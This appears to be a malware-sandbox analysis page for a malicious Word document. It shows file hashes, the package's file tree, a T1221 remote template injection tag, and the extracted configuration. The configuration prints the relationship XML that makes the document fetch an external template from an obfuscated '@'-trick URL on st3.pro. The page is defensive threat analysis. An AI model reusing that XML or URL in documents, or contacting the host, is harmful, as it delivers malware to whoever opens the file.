Malicious
Malicious

5bdcf7d885f8b8e20dc16d72b1326a12

MS Word Document
|
MD5: 5bdcf7d885f8b8e20dc16d72b1326a12
|
Size: 184.86 KB
|
application/msword

Office Document
Remote Template Injection
T1221
Moderately Suspicious Document

Print
General
Structural Analysis
Config.1
Yara Rules9
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
5bdcf7d885f8b8e20dc16d72b1326a12
Sha1
4e88163ecec41c1b44f0e807ac453989ee7225da
Sha256
4a4b392d95ca2f8828bcf1addd824f554471e777cdb26dfe40f497b2d8201f2f
Sha384
d602cc13ca255c60f333c7c30ac99d09c0f6f2ce1dddd99db6e86893cf42b10bf60d39b6805cfab7e94ac81b636567c1
Sha512
f7df37487b2ffdfe621ebf7ac439fec1d3802fbcff1693cac5bd4bb086f2db1ffe01dc175a0e4979ea66bac5b51331d7424169189002c6e328417075d4cd764d
SSDeep
3072:g+HLrxibi6mmnm/mhfHVxibi6ma817FFL+Ceb:g+H5lmme/la817FFL+Co
TLSH
9E041230CC41254BE1DB76721FA16A48ED4C4A02D56F014C4DB22A97BEEBED3EE85E47
File Structure
5bdcf7d885f8b8e20dc16d72b1326a12
Office Document
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
[Content_Types].xml
Xml
_rels
.rels
Xml
word
Malicious
_rels
Malicious
document.xml.rels
Xml
header2.xml.rels
Xml
footer2.xml.rels
Xml
settings.xml.rels
Xml
Remote Template Injection
T1221
Moderately Suspicious Document
Malicious
document.xml
Xml
footnotes.xml
Xml
footer2.xml
Xml
footer3.xml
Xml
header3.xml
Xml
endnotes.xml
Xml
header2.xml
Xml
media
image1.emf
image2.emf
embeddings
Microsoft_Office_Excel_Worksheet1.xlsx
Office Document
[Content_Types].xml
Xml
_rels
.rels
Xml
xl
_rels
workbook.xml.rels
Xml
workbook.xml
Xml
sharedStrings.xml
Xml
worksheets
_rels
sheet1.xml.rels
Xml
sheet1.xml
Xml
theme
theme1.xml
Xml
styles.xml
Xml
drawings
vmlDrawing1.vml
printerSettings
printerSettings1.bin
comments1.xml
Xml
docProps
thumbnail.wmf
core.xml
Xml
app.xml
Xml
Microsoft_Office_Excel_Worksheet2.xlsx
Office Document
docProps
thumbnail.wmf
core.xml
Xml
theme
theme1.xml
Xml
settings.xml
Xml
styles.xml
Xml
webSettings.xml
Xml
fontTable.xml
Xml
docProps
app.xml
Xml
core.xml
Xml
Malware Configuration - Remote Template
Config. Field
Value
Target

https://bestpeopelskingfortheempireworldbestthingstobefgoodandgreatstobebest.Docx@st3.pro/L4A6rzm

Path

settings.xml.rels

XPath

/Relationships/Relationship

Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://bestpeopelskingfortheempireworldbestthingstobefgoodandgreatstobebest.Docx@st3.pro/L4A6rzm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Artefacts
Name
Value
Remote Template - Highly Suspicious

https://bestpeopelskingfortheempireworldbestthingstobefgoodandgreatstobebest.Docx@st3.pro/L4A6rzm

5bdcf7d885f8b8e20dc16d72b1326a12 (184.86 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙